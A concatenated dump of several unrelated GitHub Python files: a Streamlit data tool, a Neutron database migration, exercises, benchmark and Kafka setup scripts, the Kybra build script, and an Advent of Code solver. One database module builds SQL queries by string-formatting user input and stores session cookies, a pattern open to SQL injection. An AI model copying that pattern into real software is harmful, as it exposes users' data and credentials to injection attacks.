You can only use columns with numbers',state.data.select_dtypes(exclude = 'O').columns)\r\n\t\t\t\tif operation_type in ['Natural logarithm','Cosine','Sine','Tangent']:\r\n\t\t\t\t\tnew_col = by_itself(state.data[transf_col],operation_type)\r\n\t\t\t\telse:\r\n\t\t\t\t\tnew_col = by_number(state.data[transf_col],operation_type)\r\n\t\t\telif type_of_operations[1] == selection_of_type:\r\n\t\t\t\tN_cols_used = st.number_input('Select the number of columns that are going to be used', value = 2)\r\n\t\t\t\tif operation_type in ['Natural logarithm','Cosine','Sine','Tangent','root','logarithm']:\r\n\t\t\t\t\tst.write('Operation not supported between columns. Try \"Operation using a single number\"')\r\n\t\t\t\telse:\r\n\t\t\t\t\tcols = []\r\n\t\t\t\t\tfor i in range(N_cols_used):\r\n\t\t\t\t\t\tcols.append(st.selectbox('Column %i' %(i+1),[i for i in state.data.select_dtypes(exclude = 'O').columns if i not in cols]))\r\n\t\t\t\t\tnew_col = by_column(state.data[cols],operation_type)\r\n\t\t\tnew_col_name = st.text_input('Name your new column. If there you name it as some existing column it will replace the old one', value = 'New')\r\n\t\t\tstate.data[new_col_name] = new_col\r\n\t\telif st.checkbox('Complex mathematical operations'):\r\n\t\t\tst.write('**WORK IN PROGRESS**')\r\n\r\n#put new vector in the data\r\n\twith st.beta_expander(\"See complete data\"):\r\n\t\tst.write(state.data)\r\n\r\n\twith st.beta_expander(\"Data visualisation\"):\r\n\t\tst.write(\"here we will put multiple plots to help visualise your data\")\r\n\t\r\n\twith st.beta_expander(\"Prediciton\"):\r\n\t\tst.write('Here we will apply statistical modeling and artificial inteligence to create equations or to predict future values')\r\n\t\r\n\twith st.beta_expander('Report'):\r\n\t\tst.write('Here we will display or download a full report on your data')\r\n\t\r\n\t\r\n\r\n\t\t","repo_name":"Danielmoraisg/data_management","sub_path":"home.py","file_name":"home.py","file_ext":"py","file_size_in_byte":7271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8671149751","text":"from alembic import op\nfrom neutron.db import migration\nfrom neutron_lib.db import constants\n\nimport sqlalchemy as sa\n\n\n\"\"\"port forwarding rule description\nRevision ID: I43e0b669096\nRevises: 34cf8b009713\nCreate Date: 2021-12-02 10:00:00.000000\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = 'I43e0b669096'\ndown_revision = '34cf8b009713'\n\nPF_TABLE_NAME = 'portforwardings'\npf_table = sa.Table(\n PF_TABLE_NAME, sa.MetaData(),\n sa.Column('id', sa.String(length=constants.UUID_FIELD_SIZE),\n nullable=False),\n sa.Column('socket', sa.String(length=36), nullable=False),\n sa.Column('external_port', sa.Integer(), nullable=False),\n sa.Column('internal_ip_address', sa.String(length=64), nullable=False),\n sa.Column('internal_port_start', sa.Integer(), nullable=False),\n sa.Column('external_port_start', sa.Integer(), nullable=False),\n sa.Column('internal_port_end', sa.Integer(), nullable=False),\n sa.Column('external_port_end', sa.Integer(), nullable=False),\n sa.Column('internal_neutron_port_id', sa.String(constants.UUID_FIELD_SIZE),\n nullable=False),\n)\n\n\ndef upgrade():\n op.add_column(PF_TABLE_NAME,\n sa.Column('internal_ip_address', sa.String(length=64),\n nullable=False))\n op.add_column(PF_TABLE_NAME, sa.Column('internal_port_start', sa.Integer(),\n nullable=False))\n op.add_column(PF_TABLE_NAME, sa.Column('internal_port_end', sa.Integer(),\n nullable=False))\n 
op.add_column(PF_TABLE_NAME, sa.Column('external_port_start', sa.Integer(),\n nullable=False))\n op.add_column(PF_TABLE_NAME, sa.Column('external_port_end', sa.Integer(),\n nullable=False))\n\n foreign_keys = clear_constraints_and_foreign()\n migrate_values()\n op.create_unique_constraint(\n columns=['floatingip_id', 'protocol',\n 'external_port_start', 'external_port_end'],\n constraint_name='uniq_port_forwardings0floatingip_id0protocol0'\n 'external_ports',\n table_name=PF_TABLE_NAME)\n\n op.create_unique_constraint(\n columns=['protocol', 'internal_neutron_port_id', 'internal_ip_address',\n 'internal_port_start', 'internal_port_end'],\n constraint_name='uniq_port_forwardings0ptcl0in_prt_id0in_ip_addr0'\n 'in_prts',\n table_name=PF_TABLE_NAME)\n\n op.drop_column(PF_TABLE_NAME, 'socket')\n\n op.drop_column(PF_TABLE_NAME, 'external_port')\n\n migration.create_foreign_keys(PF_TABLE_NAME, foreign_keys)\n\n\ndef clear_constraints_and_foreign():\n inspect = sa.inspect(op.get_bind())\n foreign_keys = inspect.get_foreign_keys(PF_TABLE_NAME)\n migration.remove_foreign_keys(PF_TABLE_NAME,\n foreign_keys)\n constraints_name = [\n 'uniq_port_forwardings0internal_neutron_port_id0socket0protocol',\n 'uniq_port_forwardings0floatingip_id0external_port0protocol']\n for constraint_name in constraints_name:\n op.drop_constraint(\n constraint_name=constraint_name,\n table_name=PF_TABLE_NAME,\n type_='unique'\n )\n\n return foreign_keys\n\n\ndef migrate_values():\n session = sa.orm.Session(bind=op.get_bind())\n values = []\n for row in session.query(pf_table):\n values.append({'id': row[0],\n 'socket': row[1],\n 'external_port': row[2]})\n\n for value in values:\n internal_ip_address, internal_port = str(\n value['socket']).split(':')\n external_port = value['external_port']\n internal_port = int(internal_port)\n session.execute(\n pf_table.update().values(\n internal_port_start=internal_port,\n internal_port_end=internal_port,\n external_port_start=external_port,\n external_port_end=external_port,\n internal_ip_address=internal_ip_address).where(\n pf_table.c.id == value['id']))\n session.commit()\n\n\ndef expand_drop_exceptions():\n \"\"\"Drop and replace the unique constraints for table portforwardings\n\n Drop the existing portforwardings foreign key uniq constraints and then\n replace them with new unique constraints with column ``protocol``.\n This is needed to use drop in expand migration to pass test_branches.\n \"\"\"\n\n return {\n sa.Column: [\n '%s.socket' % PF_TABLE_NAME,\n '%s.external_port' % PF_TABLE_NAME\n ],\n sa.Constraint: [\n \"portforwardings_ibfk_1\",\n \"portforwardings_ibfk_2\",\n \"portforwardings_ibfk_3\",\n \"portforwardings_ibfk_4\",\n \"uniq_port_forwardings0floatingip_id0external_port0protocol\",\n \"uniq_port_forwardings0internal_neutron_port_id0socket0protocol\",\n \"portforwardings_floatingip_id_fkey\",\n \"portforwardings_internal_neutron_port_id_fkey\",\n \"portforwardings_standard_attr_id_fkey\"\n ]\n }\n","repo_name":"openstack/neutron","sub_path":"neutron/db/migration/alembic_migrations/versions/zed/expand/I43e0b669096_port_forwarding_port_ranges.py","file_name":"I43e0b669096_port_forwarding_port_ranges.py","file_ext":"py","file_size_in_byte":5043,"program_lang":"python","lang":"en","doc_type":"code","stars":1353,"dataset":"github-code","pt":"72"} +{"seq_id":"40139361368","text":"first_sequence = set([int(el) for el in input().split()])\nsecond_sequence = set([int(el) for el in input().split()])\n\nnumber = int(input())\n\nfor num in range(number):\n command = 
input().split()\n if command[0] == \"Add\":\n new_sequence = set([int(el) for el in command[2:]])\n if command[1] == \"First\":\n first_sequence.union(new_sequence)\n elif command[2] == \"Second\":\n second_sequence.union(new_sequence)\n elif command[0] == \"Remove\":\n new_sequence = set([int(el) for el in command[2:]])\n if command[1] == \"First\":\n first_sequence = first_sequence.difference(new_sequence)\n elif command[1] == \"Second\":\n second_sequence = second_sequence.difference(new_sequence)\n else:\n print(first_sequence.issubset(second_sequence) or second_sequence.issubset(first_sequence))\n\nprint(*sorted(first_sequence), sep=\", \")\nprint(*sorted(second_sequence), sep=\", \")\n","repo_name":"HristinaMateeva/software_engineering_path_softuni","sub_path":"03_python_advanced/02_exercises/03_stacks_queues_tuples_and_sets/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14666890563","text":"\"\"\"Output benchmark results.\"\"\"\n\nimport llama_bench\nimport pkg_resources\nimport os\nimport sysinfo\nfrom tabulate import tabulate\n\n\ndef print_header():\n \"\"\"Print benchmark header.\"\"\"\n print(\n f\"\"\"\nRacing Llama Benchmark\n\nSystem Information:\n{sysinfo.basic()}\"\"\"\n )\n\n\ndef print_results(results, parser, type=\"model\"):\n \"\"\"Print benchmark results.\n\n Args:\n results (dict): Benchmark results.\n \"\"\"\n print_header()\n if type == \"directory\":\n denorm = denormalize_results(results)\n print(\n f\"\"\"Runs: {parser.parse_args().runs}\nllama-cpp-python version: {pkg_resources.get_distribution(\"llama-cpp-python\").version}\nCPU Threads: {parser.parse_args().threads}\nGPU Acceleration: {parser.parse_args().gpu}\nSeed: {parser.parse_args().seed}\nPrompt: {parser.parse_args().prompt}\n\nEval Tokens per second:\n{create_table(denorm, \"eval\")}\n\nPrompt Tokens per second:\n{create_table(denorm, \"prompt\")}\n \"\"\"\n )\n else:\n print(\n f\"\"\"Runs: {parser.parse_args().runs}\nllama-cpp-python version: {pkg_resources.get_distribution(\"llama-cpp-python\").version}\nCPU Threads: {parser.parse_args().threads}\nGPU Acceleration: {parser.parse_args().gpu}\nModel: {os.path.basename(parser.parse_args().model)}\nSeed: {parser.parse_args().seed}\nPrompt: {parser.parse_args().prompt}\n{llama_bench.run_summary(results)}\n \"\"\"\n )\n\n\ndef denormalize_results(results):\n \"\"\"Denormalize benchmark results.\n\n Args:\n results (dict): Benchmark results.\n\n Returns:\n list: Denormalized benchmark results.\n \"\"\"\n table = []\n\n for result in results:\n table.append(\n {\n \"name\": result[\"name\"],\n \"parameters\": result[\"parameters\"],\n \"quant\": result[\"quant\"],\n \"eval_fastest\": result[\"data\"][\"eval\"][\"fastest\"],\n \"eval_slowest\": result[\"data\"][\"eval\"][\"slowest\"],\n \"eval_mean\": result[\"data\"][\"eval\"][\"mean\"],\n \"eval_median\": result[\"data\"][\"eval\"][\"median\"],\n \"prompt_fastest\": result[\"data\"][\"prompt\"][\"fastest\"],\n \"prompt_slowest\": result[\"data\"][\"prompt\"][\"slowest\"],\n \"prompt_mean\": result[\"data\"][\"prompt\"][\"mean\"],\n \"prompt_median\": result[\"data\"][\"prompt\"][\"median\"],\n }\n )\n return table\n\n\ndef create_table(denorm, type):\n \"\"\"Create table of benchmark results.\n\n Args:\n denorm (list): Denormalized benchmark results.\n type (str): Type of benchmark results.\n\n Returns:\n str: Table of benchmark results.\n \"\"\"\n table = [[\"Model\", 
\"Params\", \"Quant\", \"Fastest\", \"Slowest\", \"Mean\", \"Median\"]]\n\n for result in denorm:\n table.append(\n [\n result[\"name\"],\n result[\"parameters\"],\n result[\"quant\"],\n result[f\"{type}_fastest\"],\n result[f\"{type}_slowest\"],\n result[f\"{type}_mean\"],\n result[f\"{type}_median\"],\n ]\n )\n\n return tabulate(table, headers=\"firstrow\", tablefmt=\"github\")\n","repo_name":"leonh316/benchmark","sub_path":"rlb/output/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"72"} +{"seq_id":"34737518563","text":"total = maisdemil = cont = 0\nlst = []\nbarato = 999999999999999999999999999999999\nbname = ''\nwhile True:\n cont += 1\n print(f'produto {cont}')\n name = str(input('Nome: '))\n preço = int(input('Preço: '))\n total = total + preço\n if preço > 1000:\n maisdemil += 1\n if preço < barato:\n barato = preço\n bname = name\n G = str(input('Quer continuar?[S/N] ')).upper()\n if G == 'N':\n break\n\nprint(f'Preço total: R${total}\\n Quantidade de produtos de mais de mil reais: R${maisdemil}')\nprint(f'Produto mais barato: {bname}')\n","repo_name":"RaoniSilvestre/Exercicios-Python","sub_path":"mundo-2/ex070.py","file_name":"ex070.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"4425385560","text":"import hopsworks\n\nproject = hopsworks.login()\n\n# create kafka topic\nKAFKA_TOPIC_NAME = \"credit_card_transactions\"\nSCHEMA_NAME = \"credit_card_transactions_schema\"\n\nkafka_api = project.get_kafka_api()\njob_api = project.get_jobs_api()\n\nschema = {\n \"type\": \"record\",\n \"name\": SCHEMA_NAME,\n \"namespace\": \"io.hops.examples.flink.examples\",\n \"fields\": [{\n \"name\": \"tid\",\n \"type\": [\"null\", \"string\"]\n }, {\n \"name\": \"datetime\",\n \"type\": [\"null\", \"long\"]\n }, {\n \"name\": \"cc_num\",\n \"type\": [\"null\", \"long\"]\n }, {\n \"name\": \"amount\",\n \"type\": [\"null\", \"double\"]\n }]\n}\n\nkafka_api.create_schema(SCHEMA_NAME, schema)\nkafka_api.create_topic(KAFKA_TOPIC_NAME, SCHEMA_NAME, 1, replicas=1, partitions=1)\n","repo_name":"logicalclocks/hopsworks-tutorials","sub_path":"integrations/java/flink/setup/kafka_topic.py","file_name":"kafka_topic.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","stars":133,"dataset":"github-code","pt":"72"} +{"seq_id":"13251466456","text":"n=int(input())\ndef dice(L):\n i=1\n j=0\n L.sort()\n l=len(L)\n while (j str:\n main_command = f\"KYBRA_VERSION={kybra.__version__} $global_kybra_cargo_bin run --manifest-path=.kybra/{canister_name}/kybra_post_install/Cargo.toml {canister_name} {candid_path}\"\n main_command_not_verbose = f'exec 3>&1; output=$({main_command} 2>&1 1>&3 3>&-); exit_code=$?; exec 3>&-; if [ $exit_code -ne 0 ]; then echo \"$output\"; exit $exit_code; fi'\n\n return f\"\"\"#!/bin/bash\n\nrust_version=\"{rust_version}\"\n\nglobal_kybra_config_dir=~/.config/kybra\nglobal_kybra_rust_dir=\"$global_kybra_config_dir\"/rust/\"$rust_version\"\nglobal_kybra_rust_bin_dir=\"$global_kybra_rust_dir\"/bin\nglobal_kybra_logs_dir=\"$global_kybra_rust_dir\"/logs\nglobal_kybra_cargo_bin=\"$global_kybra_rust_bin_dir\"/cargo\nglobal_kybra_rustup_bin=\"$global_kybra_rust_bin_dir\"/rustup\n\nexport CARGO_TARGET_DIR=\"$global_kybra_config_dir\"/rust/target\nexport CARGO_HOME=\"$global_kybra_rust_dir\"\nexport 
RUSTUP_HOME=\"$global_kybra_rust_dir\"\n\necho \"\\nPreparing canister binaries for upload...\\n\"\n\n{main_command if is_verbose else main_command_not_verbose}\n \"\"\"\n\n\ndef parse_args_or_exit(args: list[str]) -> Args:\n args = args[1:] # Discard the path to kybra\n\n flags = [arg for arg in args if (arg.startswith(\"-\") or arg.startswith(\"--\"))]\n args = [arg for arg in args if not (arg.startswith(\"-\") or arg.startswith(\"--\"))]\n\n if len(args) == 0:\n print(f\"\\nkybra {kybra.__version__}\")\n print(\"\\nUsage: kybra [-v|--verbose] \")\n sys.exit(0)\n\n if len(args) != 3:\n print(red(\"\\n💣 Kybra error: wrong number of arguments\\n\"))\n print(\"Usage: kybra [-v|--verbose] \")\n print(\"\\n💀 Build failed!\")\n sys.exit(1)\n\n return {\n \"empty\": False,\n \"flags\": {\"verbose\": \"--verbose\" in flags or \"-v\" in flags},\n \"canister_name\": args[0],\n \"entry_point\": args[1],\n \"did_path\": args[2],\n }\n\n\ndef create_paths(args: Args) -> Paths:\n canister_name = args[\"canister_name\"]\n\n # This is the path to the developer's entry point Python file passed into python -m kybra from the dfx.json build command\n py_entry_file_path = args[\"entry_point\"]\n\n # This is the Python module name of the developer's Python project, derived from the entry point Python file passed into python -m kybra from the dfx.json build command\n py_entry_module_name = Path(py_entry_file_path).stem\n\n # This is the location of all code used to generate the final canister Rust code\n canister_path = f\".kybra/{canister_name}\"\n\n # We want to bundle/gather all Python files into the python_source directory for RustPython freezing\n # The location that Kybra will look to when running py_freeze!\n # py_freeze! will compile all of the Python code in the directory recursively (modules must have an __init__.py to be included)\n python_source_path = f\"{canister_path}/python_source\"\n\n py_file_names_file_path = f\"{canister_path}/py_file_names.csv\"\n\n # This is the path to the developer's Candid file passed into python -m kybra from the dfx.json build command\n did_path = args[\"did_path\"]\n\n # This is the path to the Kybra compiler Rust code delivered with the Python package\n compiler_path = os.path.dirname(kybra.__file__) + \"/compiler\"\n\n # This is the final generated Rust file that is the canister\n lib_path = f\"{canister_path}/src/lib.rs\"\n\n # This is the location of the Candid file generated from the final generated Rust file\n generated_did_path = f\"{canister_path}/index.did\"\n\n # This is the unzipped generated Wasm that is the canister\n wasm_path = f\"{canister_path}/{canister_name}.wasm\"\n\n # This is where we store custom Python modules, such as stripped-down versions of stdlib modules\n custom_modules_path = f\"{compiler_path}/custom_modules\"\n\n home_dir = os.path.expanduser(\"~\")\n global_kybra_config_dir = f\"{home_dir}/.config/kybra\"\n global_kybra_rust_dir = f\"{global_kybra_config_dir}/rust/{kybra.__rust_version__}\"\n global_kybra_rust_bin_dir = f\"{global_kybra_rust_dir}/bin\"\n global_kybra_target_dir = f\"{global_kybra_config_dir}/rust/target\"\n global_kybra_bin_dir = f\"{global_kybra_config_dir}/{kybra.__version__}/bin\"\n\n return {\n \"py_entry_file\": py_entry_file_path,\n \"py_entry_module_name\": py_entry_module_name,\n \"canister\": canister_path,\n \"python_source\": python_source_path,\n \"py_file_names_file\": py_file_names_file_path,\n \"did\": did_path,\n \"compiler\": compiler_path,\n \"lib\": lib_path,\n \"generated_did\": 
generated_did_path,\n \"wasm\": wasm_path,\n \"custom_modules\": custom_modules_path,\n \"global_kybra_config_dir\": global_kybra_config_dir,\n \"global_kybra_rust_dir\": global_kybra_rust_dir,\n \"global_kybra_rust_bin_dir\": global_kybra_rust_bin_dir,\n \"global_kybra_target_dir\": global_kybra_target_dir,\n \"global_kybra_bin_dir\": global_kybra_bin_dir,\n }\n\n\ndef detect_initial_compile(global_kybra_target_dir: str) -> bool:\n return not os.path.exists(global_kybra_target_dir)\n\n\n@timed_inline\ndef compile_python_or_exit(\n paths: Paths, cargo_env: dict[str, str], verbose: bool = False\n):\n bundle_python_code(paths)\n run_kybra_generate_or_exit(paths, cargo_env, verbose)\n run_rustfmt_or_exit(paths, cargo_env, verbose)\n\n\ndef encourage_patience(is_initial_compile: bool) -> str:\n return \" (be patient, this will take a while)\" if is_initial_compile else \"\"\n\n\ndef bundle_python_code(paths: Paths):\n # Begin module bundling/gathering process\n path = (\n list(filter(lambda x: x.startswith(os.getcwd()), sys.path))\n + [\n os.path.dirname(paths[\"py_entry_file\"]),\n ]\n + site.getsitepackages()\n )\n\n graph = modulegraph.modulegraph.ModuleGraph(path) # type: ignore\n entry_point = graph.run_script(paths[\"py_entry_file\"]) # type: ignore\n\n python_source_path = paths[\"python_source\"]\n\n if os.path.exists(python_source_path):\n shutil.rmtree(python_source_path)\n\n os.makedirs(python_source_path)\n\n # Copy our custom Python modules into the python_source directory\n shutil.copytree(paths[\"custom_modules\"], python_source_path, dirs_exist_ok=True)\n\n flattened_graph = list(graph.flatten(start=entry_point)) # type: ignore\n\n for node in flattened_graph: # type: ignore\n if type(node) == modulegraph.modulegraph.Script: # type: ignore\n shutil.copy(\n node.filename, f\"{python_source_path}/{os.path.basename(node.filename)}\" # type: ignore\n )\n\n if type(node) == modulegraph.modulegraph.SourceModule: # type: ignore\n shutil.copy(\n node.filename, f\"{python_source_path}/{os.path.basename(node.filename)}\" # type: ignore\n )\n\n if type(node) == modulegraph.modulegraph.Package: # type: ignore\n shutil.copytree(\n node.packagepath[0], # type: ignore\n f\"{python_source_path}/{node.identifier}\", # type: ignore\n dirs_exist_ok=True,\n ignore=ignore_specific_dir,\n )\n\n if type(node) == modulegraph.modulegraph.NamespacePackage: # type: ignore\n shutil.copytree(\n node.packagepath[0], # type: ignore\n f\"{python_source_path}/{node.identifier}\", # type: ignore\n dirs_exist_ok=True,\n ignore=ignore_specific_dir,\n )\n\n py_file_names = list( # type: ignore\n filter(\n lambda filename: filename is not None and filename.endswith(\".py\"), # type: ignore\n map(\n lambda node: node.filename, # type: ignore\n filter(\n lambda node: node.filename # type: ignore\n is not \"-\", # This filters out namespace packages\n flattened_graph, # type: ignore\n ), # type: ignore\n ), # type: ignore\n ) # type: ignore\n )\n\n create_file(paths[\"py_file_names_file\"], \",\".join(py_file_names)) # type: ignore\n\n\ndef ignore_specific_dir(dirname: str, filenames: list[str]) -> list[str]:\n if \"kybra_post_install/src/Lib\" in dirname:\n return filenames\n else:\n return []\n\n\ndef parse_kybra_generate_error(stdout: bytes) -> str:\n err = stdout.decode(\"utf-8\")\n std_err_lines = err.splitlines()\n try:\n line_where_error_message_starts = next(\n i\n for i, v in enumerate(std_err_lines)\n if v.startswith(\"thread 'main' panicked at '\")\n )\n line_where_error_message_ends = next(\n i for i, v in 
enumerate(std_err_lines) if \"', src/\" in v\n )\n except:\n return err\n\n err_lines = std_err_lines[\n line_where_error_message_starts : line_where_error_message_ends + 1\n ]\n err_lines[0] = err_lines[0].replace(\"thread 'main' panicked at '\", \"\")\n err_lines[-1] = re.sub(\"', src/.*\", \"\", err_lines[-1])\n\n return red(\"\\n\".join(err_lines))\n\n\ndef run_rustfmt_or_exit(paths: Paths, cargo_env: dict[str, str], verbose: bool = False):\n rustfmt_result = subprocess.run(\n [\n f\"{paths['global_kybra_rust_bin_dir']}/rustfmt\",\n \"--edition=2018\",\n paths[\"lib\"],\n ],\n capture_output=not verbose,\n env=cargo_env,\n )\n\n if rustfmt_result.returncode != 0:\n print(red(\"\\n💣 Kybra error: internal Rust formatting\"))\n print(\n f'\\nPlease open an issue at https://github.com/demergent-labs/kybra/issues/new\\nincluding this message and the following error:\\n\\n {red(rustfmt_result.stderr.decode(\"utf-8\"))}'\n )\n print(\"💀 Build failed\")\n sys.exit(1)\n\n\n@timed_inline\ndef optimize_wasm_binary_or_exit(\n paths: Paths, canister_name: str, cargo_env: dict[str, str], verbose: bool = False\n):\n optimization_result = subprocess.run(\n [\n f\"{paths['global_kybra_rust_bin_dir']}/ic-wasm\",\n f\"{paths['canister']}/{canister_name}_app.wasm\",\n \"-o\",\n f\"{paths['canister']}/{canister_name}_app.wasm\",\n \"shrink\",\n ],\n capture_output=not verbose,\n )\n\n if optimization_result.returncode != 0:\n print(red(\"\\n💣 Kybra error: optimizing generated Wasm\"))\n print(optimization_result.stderr.decode(\"utf-8\"))\n print(\"💀 Build failed\")\n sys.exit(1)\n\n add_metadata_to_wasm_or_exit(paths, canister_name, verbose=verbose)\n\n os.system(f\"gzip -9 -f -k {paths['canister']}/{canister_name}_app.wasm\")\n\n\ndef add_metadata_to_wasm_or_exit(\n paths: Paths, canister_name: str, verbose: bool = False\n):\n # TODO removing this until we solve the Candid issue: https://forum.dfinity.org/t/automatically-generate-candid-from-rust-sources/5924/34\n # TODO our current solution is to grab the Candid in post_install because of issues with Wasmer\n # TODO Unfortunately this means that on first deploy the candid:service metadata is incorrect\n # TODO thus we are relying on __get_candid_interface_tmp_hack for the time being\n # add_candid_to_wasm_result = subprocess.run(\n # [\n # f\"{paths['global_kybra_rust_bin_dir']}/ic-wasm\",\n # f\"{paths['canister']}/{canister_name}_app.wasm\",\n # \"-o\",\n # f\"{paths['canister']}/{canister_name}_app.wasm\",\n # \"metadata\",\n # \"candid:service\",\n # \"-f\",\n # paths[\"did\"],\n # \"-v\",\n # \"public\",\n # ],\n # capture_output=not verbose,\n # )\n\n # if add_candid_to_wasm_result.returncode != 0:\n # print(red(\"\\n💣 Kybra error: adding candid to Wasm\"))\n # print(add_candid_to_wasm_result.stderr.decode(\"utf-8\"))\n # print(\"💀 Build failed\")\n # sys.exit(1)\n\n add_cdk_info_to_wasm_result = subprocess.run(\n [\n f\"{paths['global_kybra_rust_bin_dir']}/ic-wasm\",\n f\"{paths['canister']}/{canister_name}_app.wasm\",\n \"-o\",\n f\"{paths['canister']}/{canister_name}_app.wasm\",\n \"metadata\",\n \"cdk\",\n \"-d\",\n f\"kybra {kybra.__version__}\",\n \"-v\",\n \"public\",\n ],\n capture_output=not verbose,\n )\n\n if add_cdk_info_to_wasm_result.returncode != 0:\n print(red(\"\\n💣 Kybra error: adding cdk name/version to Wasm\"))\n print(add_cdk_info_to_wasm_result.stderr.decode(\"utf-8\"))\n print(\"💀 Build failed\")\n sys.exit(1)\n\n\ndef show_empathy(is_initial_compile: bool) -> str:\n return (\n \" (❤ hang in there, this will be faster next 
time)\"\n if is_initial_compile\n else \"\"\n )\n\n\ndef create_file(file_path: str, contents: str):\n file = open(file_path, \"w\")\n file.write(contents)\n file.close()\n\n\ndef inline_timed(\n label: str,\n body: Callable[..., Any],\n *args: Any,\n verbose: bool = False,\n **kwargs: Any,\n) -> float:\n print(label)\n start_time = time.time()\n body(*args, verbose=verbose, **kwargs)\n end_time = time.time()\n duration = end_time - start_time\n\n if verbose:\n print(f\"{label} finished in {round(duration, 2)}s\")\n else:\n move_cursor_up_one_line = \"\\x1b[1A\"\n print(f'{move_cursor_up_one_line}{label} {dim(f\"{round(duration, 2)}s\")}')\n\n return end_time - start_time\n\n\nmain()\n","repo_name":"demergent-labs/kybra","sub_path":"kybra/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":16647,"program_lang":"python","lang":"en","doc_type":"code","stars":46,"dataset":"github-code","pt":"72"} +{"seq_id":"9690282964","text":"from .DB_user import link\n\n\ndef insert_jwxt(qq_number, cookie):\n sql = \"insert into jwxt values('%s','%s')\" % (cookie, qq_number)\n print(sql)\n con = link()\n cursor = con.cursor()\n try:\n cursor.execute(sql)\n con.commit()\n except Exception as e:\n print(e)\n con.rollback()\n\n\ndef user_check(qq_number):\n try:\n sql = \"select qq_number from jwxt where qq_number = '%s'\" % qq_number\n con = link()\n cursor = con.cursor()\n cursor.execute(sql)\n result_QQ = cursor.fetchone()\n con.close()\n if result_QQ is None:\n return False\n else:\n return True\n except Exception as e:\n return -1\n\ndef get_cookie(qq_number):\n try:\n sql = \"select cookie from jwxt where qq_number = '%s'\" % qq_number\n con = link()\n cursor = con.cursor()\n cursor.execute(sql)\n cookie = cursor.fetchone()\n con.close()\n if cookie is None:\n return False\n else:\n return cookie[0]\n except Exception as e:\n return -1","repo_name":"takanashi-shiro/Xishun_UI_based_on_Kivy","sub_path":"database/jwxt_DB.py","file_name":"jwxt_DB.py","file_ext":"py","file_size_in_byte":1092,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"16853048189","text":"from __future__ import annotations\n# from typing_extensions import Self\n\nimport heapq\nimport re\nfrom dataclasses import dataclass\nimport argparse\nimport os.path\nimport itertools\n\nimport pytest\nimport support\n\nINPUT_TXT = os.path.join(os.path.dirname(__file__), 'input.txt')\n\n\n@dataclass\nclass Valve:\n name: str\n flow_rate: int\n paths: list[str]\n is_open: bool = False\n is_visited: bool = False\n\n def __hash__(self):\n return hash(self.name)\n\n def __eq__(self, other):\n return self.name == other.name\n\n def potential(self, minutes_remaining: int):\n if self.is_open:\n return 0\n return self.flow_rate * minutes_remaining\n\n\n\nclass Valves:\n valves: frozenset[Valve]\n minutes_remaining: int\n\n def __init__(self, valves, minutes_remaining: int = 30):\n self.valves = valves\n self.minutes_remaining = minutes_remaining\n\n def get(self, name: str):\n try:\n return next(filter(lambda v: v.name == name, self.valves))\n except StopIteration:\n raise ValueError(f'No valve exists with name {name}')\n\n def dist(self, v1s: str, v2s: str):\n \"\"\"Calculated distance between two valves, using their names\"\"\"\n if v1s == v2s:\n return 0\n v1, v2 = self.get(v1s), self.get(v2s)\n queue: list[Valve] = list()\n for i, p in enumerate(v1.paths):\n heapq.heappush(queue, (1, i, set(), self.get(p)))\n while queue:\n val: tuple[int, int, set[Valve], Valve] = 
heapq.heappop(queue)\n dist, _, visited, v = val\n if v == v2:\n return dist\n else:\n visited.add(v)\n for pth in v.paths:\n i += 1\n if self.get(pth) not in visited:\n heapq.heappush(queue, (dist + 1, i, visited, self.get(pth)))\n raise AssertionError('There should be no stranded valves')\n\nregexp = re.compile(r\"^Valve (?P[A-Z]+) has flow rate=(?P[0-9]+); \\w+ \\w+ to \\w+ (?P[\\w, ]+)$\")\n\n\ndef compute(s: str) -> int:\n ls = s.strip().splitlines()\n closed_valves: set[Valve] = set()\n for ln in ls:\n match = regexp.match(ln.strip())\n vlv = Valve(name=match.group(\"name\"), flow_rate=int(match.group(\"flow_rate\")), paths=[p.strip() for p in match.group(\"valves\").split(',')])\n closed_valves.add(vlv)\n v = Valves(closed_valves)\n interesting_valves = [\"AA\"] + [vv.name for vv in closed_valves if vv.flow_rate > 0]\n d = {}\n for a, b in itertools.combinations(interesting_valves, 2):\n d[(a, b)] = v.dist(a, b)\n d[(b, a)] = v.dist(a, b)\n flow_rates = {vv.name: vv.flow_rate for vv in closed_valves}\n queue = list()\n max_pressure = -1\n queue = [(0, 30, ('AA',),)]\n while queue:\n pressure, time, route = queue.pop()\n cur_valve = route[-1]\n if pressure > max_pressure:\n max_pressure = pressure\n for to_open in set(interesting_valves) - set(route):\n if d[(cur_valve, to_open)] < time:\n remaining_time = time - d[(cur_valve, to_open)] - 1\n queue.append((\n pressure + flow_rates[to_open] * remaining_time,\n remaining_time,\n route + (to_open,)\n ))\n return max_pressure\n\n\nINPUT_S = '''\\\nValve AA has flow rate=0; tunnels lead to valves DD, II, BB\nValve BB has flow rate=13; tunnels lead to valves CC, AA\nValve CC has flow rate=2; tunnels lead to valves DD, BB\nValve DD has flow rate=20; tunnels lead to valves CC, AA, EE\nValve EE has flow rate=3; tunnels lead to valves FF, DD\nValve FF has flow rate=0; tunnels lead to valves EE, GG\nValve GG has flow rate=0; tunnels lead to valves FF, HH\nValve HH has flow rate=22; tunnel leads to valve GG\nValve II has flow rate=0; tunnels lead to valves AA, JJ\nValve JJ has flow rate=21; tunnel leads to valve II\n'''\nEXPECTED = 1651\n\n\n@pytest.mark.parametrize(\n ('input_s', 'expected'),\n (\n (INPUT_S, EXPECTED),\n ),\n)\ndef test(input_s: str, expected: int) -> None:\n assert compute(input_s) == expected\n\n\ndef main() -> int:\n parser = argparse.ArgumentParser()\n parser.add_argument('data_file', nargs='?', default=INPUT_TXT)\n args = parser.parse_args()\n with open(args.data_file) as f, 